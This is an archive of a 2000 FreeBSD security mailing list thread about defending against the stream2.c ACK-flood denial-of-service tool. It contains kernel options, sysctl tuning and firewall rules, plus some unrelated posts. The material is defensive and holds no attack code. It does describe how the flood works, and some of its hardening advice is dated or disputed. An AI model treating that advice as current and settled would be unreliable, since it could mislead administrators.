4.0-20000608-STABLE, but stream2.c attack freezed this > >FreeBSD box as before! > >Help! > > > >Best regards, > >Maks Maksimov mailto:maksim@tts.tomsk.su > > > > > > > > > > > > > >To Unsubscribe: send mail to majordomo@FreeBSD.org > >with "unsubscribe freebsd-security" in the body of the message > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 21 9:15:20 2000 Delivered-To: freebsd-security@freebsd.org Received: from silby.com (cb34181-a.mdsn1.wi.home.com [24.14.173.39]) by hub.freebsd.org (Postfix) with SMTP id 879C137B887 for ; Wed, 21 Jun 2000 09:15:16 -0700 (PDT) (envelope-from silby@silby.com) Received: (qmail 60722 invoked by uid 1000); 21 Jun 2000 16:15:12 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 21 Jun 2000 16:15:12 -0000 Date: Wed, 21 Jun 2000 11:15:12 -0500 (CDT) From: Mike Silbersack To: Maksimov Maksim Cc: freebsd-security@FreeBSD.ORG Subject: Re: How defend from stream2.c attack? In-Reply-To: <000401bfdb64$3eae8320$0c3214d4@dragonland.tts.tomsk.su> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Is ICMP_BANDLIM enabled? If so, crank net.inet.icmp.icmplim down to 20 or so, and you should be just as protected as if enabling the restrict RST option. (And if it's not compiled in, do so!) Mike "Silby" Silbersack On Wed, 21 Jun 2000, Maksimov Maksim wrote: > How defend from stream2.c attack (flooding ACK-packets) on my FreeBSD box? > I install FreeBSD 4.0-20000608-STABLE, but stream2.c attack freezed this > FreeBSD box as before! > Help! > > Best regards, > Maks Maksimov mailto:maksim@tts.tomsk.su > > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 21 10: 2:49 2000 Delivered-To: freebsd-security@freebsd.org Received: from ocis.ocis.net (ocis.ocis.net [209.52.173.1]) by hub.freebsd.org (Postfix) with ESMTP id C4C4237C17F for ; Wed, 21 Jun 2000 10:02:44 -0700 (PDT) (envelope-from vdrifter@ocis.ocis.net) Received: from localhost (vdrifter@localhost) by ocis.ocis.net (8.9.3/8.9.3) with ESMTP id KAA05832; Wed, 21 Jun 2000 10:02:35 -0700 Date: Wed, 21 Jun 2000 10:02:35 -0700 (PDT) From: John F Cuzzola To: Mike Silbersack Cc: Maksimov Maksim , freebsd-security@FreeBSD.ORG Subject: Re: How defend from stream2.c attack? In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi There, Thanks for the information. I use alot of FreeBSD servers as dedicated firewalls and as such am very interested in this kind of information. I have set net.inet.icmp.icmplim down to 20 (it was set at 200) as recommended and was wondering what exactly does this variable do? Also do you recommend compiling the kernel with the restrict RST option as well and what are the implications of doing so? (ie: what does it break?) Tanks Mike (& everyone who contributes to this listserv) On Wed, 21 Jun 2000, Mike Silbersack wrote: > > Is ICMP_BANDLIM enabled? If so, crank net.inet.icmp.icmplim down to 20 or > so, and you should be just as protected as if enabling the restrict RST > option. > > (And if it's not compiled in, do so!) > > Mike "Silby" Silbersack > > On Wed, 21 Jun 2000, Maksimov Maksim wrote: > > > How defend from stream2.c attack (flooding ACK-packets) on my FreeBSD box? > > I install FreeBSD 4.0-20000608-STABLE, but stream2.c attack freezed this > > FreeBSD box as before! > > Help! > > > > Best regards, > > Maks Maksimov mailto:maksim@tts.tomsk.su > > > > > > > > > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-security" in the body of the message > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 21 12: 3:44 2000 Delivered-To: freebsd-security@freebsd.org Received: from lariat.org (lariat.org [12.23.109.2]) by hub.freebsd.org (Postfix) with ESMTP id 4657037B6CA for ; Wed, 21 Jun 2000 12:03:38 -0700 (PDT) (envelope-from brett@lariat.org) Received: from mustang.lariat.org (IDENT:ppp0.lariat.org@lariat.org [12.23.109.2]) by lariat.org (8.9.3/8.9.3) with ESMTP id NAA23733; Wed, 21 Jun 2000 13:03:18 -0600 (MDT) Message-Id: <4.3.2.7.2.20000621125756.048b6d80@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Version 4.3.2 Date: Wed, 21 Jun 2000 13:03:07 -0600 To: Mike Silbersack , Maksimov Maksim From: Brett Glass Subject: Re: How defend from stream2.c attack? Cc: freebsd-security@FreeBSD.ORG In-Reply-To: References: <000401bfdb64$3eae8320$0c3214d4@dragonland.tts.tomsk.su> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org At 10:15 AM 6/21/2000, Mike Silbersack wrote: >Is ICMP_BANDLIM enabled? If so, crank net.inet.icmp.icmplim down to 20 or >so, and you should be just as protected as if enabling the restrict RST >option. If it's an ACK flood, limiting RSTs is important because the response to an unexpected ACK is normally supposed to be a RST, not an ICMP packet. The various "stream.c" exploits cause ICMP floods as well, but this is a secondary effect. The ICMP packets are triggered when RSTs from the attacked host(s) hit the upstream router and the spoofed addresses are detected. If there are fewer (or no) RSTs, there will not be an ICMP flood. It's a good idea to turn on ICMP bandwitdh limiting, RST restriction, and SYN+FIN dropping in your kernel configuration and rc.conf. --Brett To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 21 14:16:20 2000 Delivered-To: freebsd-security@freebsd.org Received: from ns.incom-svyaz.ru (ns.incom-svyaz.ru [212.1.225.11]) by hub.freebsd.org (Postfix) with ESMTP id 795F337C058 for ; Wed, 21 Jun 2000 14:16:16 -0700 (PDT) (envelope-from anton@incom-svyaz.ru) Received: from star ([213.156.136.163]) by ns.incom-svyaz.ru (8.9.3/8.9.3) with SMTP id BAA78755 for ; Thu, 22 Jun 2000 01:16:50 +0400 (MSD) (envelope-from anton@incom-svyaz.ru) Message-ID: <00f601bfdbc5$91fed320$9601010a@incomsvyaz.ru> From: "Anton A Chebotarev" To: Subject: Date: Thu, 22 Jun 2000 01:13:32 +0400 MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_NextPart_000_00F3_01BFDBE7.152A8660" X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.00.2919.6600 X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2919.6600 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org This is a multi-part message in MIME format. ------=_NextPart_000_00F3_01BFDBE7.152A8660 Content-Type: text/plain; charset="koi8-r" Content-Transfer-Encoding: quoted-printable ------=_NextPart_000_00F3_01BFDBE7.152A8660 Content-Type: text/html; charset="koi8-r" Content-Transfer-Encoding: quoted-printable
 
------=_NextPart_000_00F3_01BFDBE7.152A8660-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 21 14:23: 5 2000 Delivered-To: freebsd-security@freebsd.org Received: from closed-networks.com (closed-networks.com [195.153.248.242]) by hub.freebsd.org (Postfix) with SMTP id D263A37C073 for ; Wed, 21 Jun 2000 14:22:56 -0700 (PDT) (envelope-from udp@closed-networks.com) Received: (qmail 6378 invoked by uid 1021); 21 Jun 2000 21:31:37 -0000 Date: Wed, 21 Jun 2000 22:29:15 +0100 From: User Datagram Protocol To: "Fast, Daniel H (Danny), SITS" Subject: Re: Resume... Message-ID: <20000621222915.N95331@closed-networks.com> Reply-To: User Datagram Protocol References: <5D6D2EC6E987D31199EC00902799EC4A020A7BBF@mo3980po01.ems.att.com> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-rmd160; protocol="application/pgp-signature"; boundary="kVcb4xucqmsYUpQy" X-Mailer: Mutt 1.0.1i In-Reply-To: <5D6D2EC6E987D31199EC00902799EC4A020A7BBF@mo3980po01.ems.att.com>; from fastd@att.com on Wed, Jun 21, 2000 at 10:32:48AM -0500 X-Echelon: MI6 Cobra GCHQ Panavia MI5 Timberline IRA NSA Mossad CIA Copperhead Organization: Closed Networks, London, UK Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --kVcb4xucqmsYUpQy Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: quoted-printable Age will mature him. A polite reminder that this isn't the appropriate forum will be heeded, and he will modify his online social behavior patterns accordingly. There's no need to mock him or antagonise him, that's just negativity, but politeness is always a good thing. With time, yes, he may grow. =20 The whole question of 'operating system' seems irrelevant- this is a human/ communication issue and one of developing a skill in adapting to particular social protocols to achieve life goals. The kid made a mistake, cut him some slack, remind him politely. Live in peace and smile. :-) On Wed, Jun 21, 2000 at 10:32:48AM -0500, Fast, Daniel H (Danny), SITS wrot= e: > This guy, original poster of the his Resume, it does not belong on the li= st. > I did not subscribe to a list to be shot marketing nor am I looking for > employees [different sites/lists for that]. --=20 Bruce M. Simpson aka 'udp' Security Analyst & UNIX Development Engine= er WWW: www.closed-networks.com/~u= dp=20 Dundee www.packetfactory.net/~u= dp United Kingdom email: udp@closed-networks.c= om --kVcb4xucqmsYUpQy Content-Type: application/pgp-signature -----BEGIN PGP SIGNATURE----- Version: PGPfreeware 5.0i for non-commercial use MessageID: VD4cB1vPKfbdxeHZGZTy+byeQ7s1tMTb iQA/AwUBOVEzq6c2TvYcUURpEQLXYACgwqLQSDchYw369FrFQhDEVh7DDE8AoPox jyOnUmuIaz7HONcsYqa8yeey =OoLz -----END PGP SIGNATURE----- --kVcb4xucqmsYUpQy-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 21 14:47:50 2000 Delivered-To: freebsd-security@freebsd.org Received: from silby.com (cb34181-a.mdsn1.wi.home.com [24.14.173.39]) by hub.freebsd.org (Postfix) with SMTP id A8FE137C098 for ; Wed, 21 Jun 2000 14:47:46 -0700 (PDT) (envelope-from silby@silby.com) Received: (qmail 61510 invoked by uid 1000); 21 Jun 2000 21:47:45 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 21 Jun 2000 21:47:45 -0000 Date: Wed, 21 Jun 2000 16:47:45 -0500 (CDT) From: Mike Silbersack To: Brett Glass Cc: Maksimov Maksim , freebsd-security@FreeBSD.ORG Subject: Re: How defend from stream2.c attack? In-Reply-To: <4.3.2.7.2.20000621125756.048b6d80@localhost> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, 21 Jun 2000, Brett Glass wrote: > At 10:15 AM 6/21/2000, Mike Silbersack wrote: > > >Is ICMP_BANDLIM enabled? If so, crank net.inet.icmp.icmplim down to 20 or > >so, and you should be just as protected as if enabling the restrict RST > >option. > > If it's an ACK flood, limiting RSTs is important because the response to > an unexpected ACK is normally supposed to be a RST, not an ICMP packet. ICMP_BANDLIM isn't a totally correct name, actually. It currently causes ICMP unreachables _and_ RST packets to be rate limited. > The various "stream.c" exploits cause ICMP floods as well, but this is > a secondary effect. > > The ICMP packets are triggered when RSTs from the attacked host(s) hit the > upstream router and the spoofed addresses are detected. If there are fewer > (or no) RSTs, there will not be an ICMP flood. > > It's a good idea to turn on ICMP bandwitdh limiting, RST restriction, and > SYN+FIN dropping in your kernel configuration and rc.conf. Given that ICMP_BANDLIM rate limits RST, it's probably better to turn on ICMP_BANDLIM and set the threshold to something in the sub-50 range. I guess if you're not using T/TCP (which I doubt anyone is anyway), turning on syn+fin dropping isn't a bad idea either. However, I'm still puzzled by the original poster's problem; from the results matt/others posted when the other stream related fixes were applied, I was under the impression that you'd still be more than OK with the default setting of 200. I don't think a freeze should result. Mike "Silby" Silbersack To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 21 15: 0:19 2000 Delivered-To: freebsd-security@freebsd.org Received: from closed-networks.com (closed-networks.com [195.153.248.242]) by hub.freebsd.org (Postfix) with SMTP id 71EF937B61E for ; Wed, 21 Jun 2000 15:00:10 -0700 (PDT) (envelope-from udp@closed-networks.com) Received: (qmail 12080 invoked by uid 1021); 21 Jun 2000 22:08:48 -0000 Mail-Followup-To: freebsd-security@freebsd.org, Dean.Brundage@EBay.Sun.COM Date: Wed, 21 Jun 2000 23:08:48 +0100 From: User Datagram Protocol To: Dean Brundage Cc: freebsd-security@freebsd.org Subject: Re: Resume... Message-ID: <20000621230848.O95331@closed-networks.com> Reply-To: User Datagram Protocol References: <200006212150.OAA14265@ha1mil.EBay.Sun.COM> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-rmd160; protocol="application/pgp-signature"; boundary="jh06fhy6YTawvwPV" X-Mailer: Mutt 1.0.1i In-Reply-To: <200006212150.OAA14265@ha1mil.EBay.Sun.COM>; from Dean.Brundage@EBay.Sun.COM on Wed, Jun 21, 2000 at 02:50:59PM -0700 X-Echelon: MI6 Cobra GCHQ Panavia MI5 Timberline IRA NSA Mossad CIA Copperhead Organization: Closed Networks, London, UK Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --jh06fhy6YTawvwPV Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: quoted-printable On Wed, Jun 21, 2000 at 02:50:59PM -0700, Dean Brundage wrote: > >X-Echelon: MI6 Cobra GCHQ Panavia MI5 Timberline IRA NSA Mossad CIA Copp= erhead > >X-Loop: FreeBSD.org >=20 > How do you get that X-Echelon line in your mail headers? > Thanks, Mutt my_hdr command. I haven't yet scripted it yet, so it's fixed and doesn't change every time. I really want to get some higher precedence keywords in there, maybe create an agent which scans CNN/NBC/CBS/Reuters/AP and comes up with keywords which are likely to trigger Echelon filters. "Through waves they shift Below they hide Corporate killers Side by side Process this signal Final post Global Defiance No hope for most Inform of liquid Sliding through air Tracking this existance Killer hardware" -- Front Line Assembly, 'Circuitry', Hard Wired, 1995 (SPV) --=20 Bruce M. Simpson aka 'udp' Security Analyst & UNIX Development Engine= er WWW: www.closed-networks.com/~u= dp=20 Dundee www.packetfactory.net/~u= dp United Kingdom email: udp@closed-networks.c= om --jh06fhy6YTawvwPV Content-Type: application/pgp-signature -----BEGIN PGP SIGNATURE----- Version: PGPfreeware 5.0i for non-commercial use MessageID: +dz5qbF5dz3PL82y5X1cDeaQrmyp5gbZ iQA/AwUBOVE88Kc2TvYcUURpEQI5lgCgrReV8aTZGEysbsKlEp+Eo8We5e8AnRCe nVPl0QeE9cFWYYagfME8VaRq =MkRV -----END PGP SIGNATURE----- --jh06fhy6YTawvwPV-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 21 15:28:43 2000 Delivered-To: freebsd-security@freebsd.org Received: from silby.com (cb34181-a.mdsn1.wi.home.com [24.14.173.39]) by hub.freebsd.org (Postfix) with SMTP id EB02237B69B for ; Wed, 21 Jun 2000 15:28:38 -0700 (PDT) (envelope-from silby@silby.com) Received: (qmail 61606 invoked by uid 1000); 21 Jun 2000 22:28:37 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 21 Jun 2000 22:28:37 -0000 Date: Wed, 21 Jun 2000 17:28:37 -0500 (CDT) From: Mike Silbersack To: John F Cuzzola Cc: Maksimov Maksim , freebsd-security@FreeBSD.ORG Subject: Re: How defend from stream2.c attack? In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, 21 Jun 2000, John F Cuzzola wrote: > > Hi There, > Thanks for the information. I use alot of FreeBSD servers as dedicated > firewalls and as such am very interested in this kind of information. I > have set net.inet.icmp.icmplim down to 20 (it was set at 200) as > recommended and was wondering what exactly does this variable do? Also do > you recommend compiling the kernel with the restrict RST option as well > and what are the implications of doing so? (ie: what does it break?) Well, in short, RSTs are sent in response to unexpected packets, such as those during when someone's attacking your box in certain manners, or in response to connections to ports which aren't open. They're not much needed, which is why you can get away with totally eliminating the sending of them as Brett suggests. However, just to be more polite in the case that a legitimate misconnection is made, it's better to leave them enabled. As for what's an appropiate setting to how many a second to send max... how many bad connections do you expect to be made to your system per second? Mike "Silby" Silbersack To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 21 17:16:10 2000 Delivered-To: freebsd-security@freebsd.org Received: from gatekeeper.tsc.tdk.com (gatekeeper.tsc.tdk.com [207.113.159.21]) by hub.freebsd.org (Postfix) with ESMTP id 5305237B95E for ; Wed, 21 Jun 2000 17:16:06 -0700 (PDT) (envelope-from gdonl@tsc.tdk.com) Received: from imap.gv.tsc.tdk.com (imap.gv.tsc.tdk.com [192.168.241.198]) by gatekeeper.tsc.tdk.com (8.8.8/8.8.8) with ESMTP id RAA06090; Wed, 21 Jun 2000 17:15:48 -0700 (PDT) (envelope-from gdonl@tsc.tdk.com) Received: from salsa.gv.tsc.tdk.com (salsa.gv.tsc.tdk.com [192.168.241.194]) by imap.gv.tsc.tdk.com (8.9.3/8.9.3) with ESMTP id RAA12262; Wed, 21 Jun 2000 17:15:48 -0700 (PDT) (envelope-from Don.Lewis@tsc.tdk.com) Received: (from gdonl@localhost) by salsa.gv.tsc.tdk.com (8.8.5/8.8.5) id RAA05962; Wed, 21 Jun 2000 17:15:47 -0700 (PDT) From: Don Lewis Message-Id: <200006220015.RAA05962@salsa.gv.tsc.tdk.com> Date: Wed, 21 Jun 2000 17:15:46 -0700 In-Reply-To: <4.3.2.7.2.20000621125756.048b6d80@localhost> References: <000401bfdb64$3eae8320$0c3214d4@dragonland.tts.tomsk.su> <4.3.2.7.2.20000621125756.048b6d80@localhost> X-Mailer: Mail User's Shell (7.2.6 beta(5) 10/07/98) To: Brett Glass , Mike Silbersack , Maksimov Maksim Subject: Re: How defend from stream2.c attack? Cc: freebsd-security@FreeBSD.ORG Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Jun 21, 1:03pm, Brett Glass wrote: } Subject: Re: How defend from stream2.c attack? } At 10:15 AM 6/21/2000, Mike Silbersack wrote: } } >Is ICMP_BANDLIM enabled? If so, crank net.inet.icmp.icmplim down to 20 or } >so, and you should be just as protected as if enabling the restrict RST } >option. } } If it's an ACK flood, limiting RSTs is important because the response to } an unexpected ACK is normally supposed to be a RST, not an ICMP packet. } } The various "stream.c" exploits cause ICMP floods as well, but this is } a secondary effect. } } The ICMP packets are triggered when RSTs from the attacked host(s) hit the } upstream router and the spoofed addresses are detected. If there are fewer } (or no) RSTs, there will not be an ICMP flood. } } It's a good idea to turn on ICMP bandwitdh limiting, RST restriction, and } SYN+FIN dropping in your kernel configuration and rc.conf. Turning on the RST restriction makes it much easier to spoof TCP connections that appear to come from your machine or to hijack established TCP connections. Also if your machine crashes and reboots, any TCP connections that were established before the crash won't get torn down until they time out (incoming telnet sessions will just hang, and you may not be able to reestablish new outgoing connections if the same port number gets reused). There's nothing an attacker can do with a SYN+FIN attack that can't be done by just sending SYN packets. Disabling SYN+FIN breaks T/TCP. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 21 17:24:36 2000 Delivered-To: freebsd-security@freebsd.org Received: from gatekeeper.tsc.tdk.com (gatekeeper.tsc.tdk.com [207.113.159.21]) by hub.freebsd.org (Postfix) with ESMTP id 2A0C937BBA6 for ; Wed, 21 Jun 2000 17:24:34 -0700 (PDT) (envelope-from gdonl@tsc.tdk.com) Received: from imap.gv.tsc.tdk.com (imap.gv.tsc.tdk.com [192.168.241.198]) by gatekeeper.tsc.tdk.com (8.8.8/8.8.8) with ESMTP id RAA06201; Wed, 21 Jun 2000 17:24:30 -0700 (PDT) (envelope-from gdonl@tsc.tdk.com) Received: from salsa.gv.tsc.tdk.com (salsa.gv.tsc.tdk.com [192.168.241.194]) by imap.gv.tsc.tdk.com (8.9.3/8.9.3) with ESMTP id RAA12308; Wed, 21 Jun 2000 17:24:29 -0700 (PDT) (envelope-from Don.Lewis@tsc.tdk.com) Received: (from gdonl@localhost) by salsa.gv.tsc.tdk.com (8.8.5/8.8.5) id RAA05975; Wed, 21 Jun 2000 17:24:29 -0700 (PDT) From: Don Lewis Message-Id: <200006220024.RAA05975@salsa.gv.tsc.tdk.com> Date: Wed, 21 Jun 2000 17:24:29 -0700 In-Reply-To: <000401bfdb64$3eae8320$0c3214d4@dragonland.tts.tomsk.su> References: <000401bfdb64$3eae8320$0c3214d4@dragonland.tts.tomsk.su> X-Mailer: Mail User's Shell (7.2.6 beta(5) 10/07/98) To: "Maksimov Maksim" , Subject: Re: How defend from stream2.c attack? Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Jun 21, 5:36pm, "Maksimov Maksim" wrote: } Subject: How defend from stream2.c attack? } How defend from stream2.c attack (flooding ACK-packets) on my FreeBSD box? } I install FreeBSD 4.0-20000608-STABLE, but stream2.c attack freezed this } FreeBSD box as before! This version of FreeBSD should be fairly immune to the standard stream2.c attack (even without ICMP_BANDLIM, which I would recommend using). It seems the biggest part of the problem was caused by the incoming packets which had IP addresses in the multicast range. We tweaked tcp_input() so that these get ignored. We didn't do anything about broadcast source addresses, so if you are attacked by a variant of stream2 that uses these you could still have problems. I would recommend adding packet filter rules that block incoming packets with IP broadcast addresses, both 255.255.255.255, and the broadcast address(es) of your local network(s). To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 21 21:27:44 2000 Delivered-To: freebsd-security@freebsd.org Received: from tts.tomsk.su (tts.tomsk.su [212.20.50.9]) by hub.freebsd.org (Postfix) with ESMTP id 315E537B5B2 for ; Wed, 21 Jun 2000 21:27:32 -0700 (PDT) (envelope-from maksim@tts.tomsk.su) Received: from dragonland (unverified [212.20.50.12]) by tts.tomsk.su (Rockliffe SMTPRA 2.1.6) with SMTP id for ; Thu, 22 Jun 2000 12:27:24 +0800 From: "Maksimov Maksim" To: Subject: How defend from stream2.c attack? Date: Thu, 22 Jun 2000 12:27:30 +0800 Message-ID: <001e01bfdc02$2ec3ea60$0c3214d4@dragonland.tts.tomsk.su> MIME-Version: 1.0 Content-Type: text/plain; charset="koi8-r" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook 8.5, Build 4.71.2173.0 X-MimeOLE: Produced By Microsoft MimeOLE V4.72.3612.1700 Importance: Normal Disposition-Notification-To: "Maksimov Maksim" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I am insert in my kernel config file this strings: options ICMP_BANDLIM options TCP_DROP_SYNFIN #drop TCP packets with SYN+FIN options TCP_RESTRICT_RST #restrict emission of TCP RST and insert in my rc.conf config file this strings: tcp_keepalive="YES" # Enable stale TCP connection timeout (or NO). tcp_drop_synfin="YES" # Set to YES to drop TCP packets with SYN+FIN # NOTE: this violates the TCP specification tcp_restrict_rst="YES" # Set to YES to restrict emission of RST icmp_drop_redirect="YES" # Set to YES to ignore ICMP REDIRECT packets icmp_log_redirect="NO" # Set to YES to log ICMP REDIRECT packets icmp_bmcastecho="NO" # respond to broadcast ping packets and recompile my kernel, and reboot my computer, and set net.inet.icmp.icmplim down to 20, and add rules to my firewall (I use IPFilter 3.4.6): block in quick on ed0 from any to 255.255.255.255 block in quick on ed0 from any to my.local.subnet.255 BUT stream2.c attack freezed my FreeBSD 4.0-20000608-STABLE as before!!! Best regards, Maks Maksimov mailto:maksim@tts.tomsk.su To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 21 21:34:21 2000 Delivered-To: freebsd-security@freebsd.org Received: from server1.mich.com (server1.mich.com [198.108.16.2]) by hub.freebsd.org (Postfix) with ESMTP id 433F337C053 for ; Wed, 21 Jun 2000 21:34:17 -0700 (PDT) (envelope-from will@almanac.yi.org) Received: from argon.gryphonsoft.com (pm003-024.dialup.bignet.net [64.79.80.120]) by server1.mich.com (8.9.3/8.9.3) with ESMTP id AAA13467; Thu, 22 Jun 2000 00:34:08 -0400 Received: by argon.gryphonsoft.com (Postfix, from userid 1000) id C03E5188D; Thu, 22 Jun 2000 00:31:51 -0400 (EDT) Date: Thu, 22 Jun 2000 00:31:51 -0400 From: Will Andrews To: Maksimov Maksim Cc: freebsd-security@FreeBSD.ORG Subject: Re: How defend from stream2.c attack? Message-ID: <20000622003151.H47446@argon.gryphonsoft.com> References: <001e01bfdc02$2ec3ea60$0c3214d4@dragonland.tts.tomsk.su> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0.1i In-Reply-To: <001e01bfdc02$2ec3ea60$0c3214d4@dragonland.tts.tomsk.su>; from maksim@tts.tomsk.su on Thu, Jun 22, 2000 at 12:27:30PM +0800 X-Operating-System: FreeBSD 5.0-CURRENT i386 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, Jun 22, 2000 at 12:27:30PM +0800, Maksimov Maksim wrote: > BUT stream2.c attack freezed my FreeBSD 4.0-20000608-STABLE as before!!! You'll have to post the source code for the best defense proposal. -- Will Andrews GCS/E/S @d- s+:+>+:- a--->+++ C++ UB++++ P+ L- E--- W+++ !N !o ?K w--- ?O M+ V-- PS+ PE++ Y+ PGP+>+++ t++ 5 X++ R+ tv+ b++>++++ DI+++ D+ G++>+++ e->++++ h! r-->+++ y? To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 21 23:49:41 2000 Delivered-To: freebsd-security@freebsd.org Received: from mics.co.za (saturn.mics.co.za [196.34.165.130]) by hub.freebsd.org (Postfix) with ESMTP id 08D9837B926 for ; Wed, 21 Jun 2000 23:49:06 -0700 (PDT) (envelope-from christiaan@mics.co.za) Received: from vision.boxlet.co.za ([196.34.165.140] helo=mics.co.za ident=vision) by mics.co.za with esmtp (Exim 3.13 #1) id 1350na-0004H9-00 for freebsd-security@freebsd.org; Thu, 22 Jun 2000 08:49:14 +0200 Message-ID: <3951B6C8.DA609831@mics.co.za> Date: Thu, 22 Jun 2000 08:48:40 +0200 From: Christiaan Rademan Organization: MICS X-Mailer: Mozilla 4.72 [en] (X11; I; FreeBSD 4.0-STABLE i386) X-Accept-Language: en MIME-Version: 1.0 To: freebsd-security@freebsd.org Subject: Hi All. Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Greetings.. We here have a FreeBSD 4.0-Stable server, running latest services. ie for mail. The problem is it has been rebooting from time to time.. No reason has been given to me in detail via the log file. The machine has definitly not been hacked according to some probes. I am left with a question, "Did I brake something, or is there a new DoS attack or something else" All I have done is changed the chflags on some odd directories /bin with -R. Directories: /bin - /sbin - /usr/bin - /usr/sbin - /usr/libexec Then I mostley went around removing +x filemodes from some slightly important suid exec, but theyr still excuteable by owner,group : root,wheel. Other than that, the server has definitly not got hardware problems, that has been replaced fully. I also have the system running kern.securelevel=3... via rc.conf I succesfully had a machine running with uptime for over 60days, with the changes. Although now I have to question why the machine reboots during the week? So far, it looks like the kernel is screwing up, for no known reason. I am about to try running the machine on a generic kernel, maybe make an attempt to see if it still brakes. If anyone has a clue what might be going wrong here, please contact me.. Regards, Christiaan Rademan To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 22 1:50:33 2000 Delivered-To: freebsd-security@freebsd.org Received: from joe.halenet.com.au (joe.halenet.com.au [203.37.141.114]) by hub.freebsd.org (Postfix) with ESMTP id 4D04F37C1EA for ; Thu, 22 Jun 2000 01:50:25 -0700 (PDT) (envelope-from timbo@halenet.com.au) Received: from temp19 (temp19.halenet.com.au [203.37.141.119]) by joe.halenet.com.au (8.9.1/8.9.1) with SMTP id TAA05797; Thu, 22 Jun 2000 19:00:35 +1000 (EST) (envelope-from timbo@halenet.com.au) Message-ID: <00eb01bfdc27$35e50520$778d25cb@halenet.com.au> From: "Tim McCullagh" To: "Christiaan Rademan" , References: <3951B6C8.DA609831@mics.co.za> Subject: Re: Hi All. Date: Thu, 22 Jun 2000 18:52:30 +1000 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.00.2919.6600 X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2919.6600 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi Christiaan, I am having the same problem. I posted a message to the ISP list a couple of days ago and it seems as if a number of people are having the same problem.. It has been suggested that I should compile a custom kernel to get around it. Some of the responses have suggested going back to 3.4 rather than 4.0 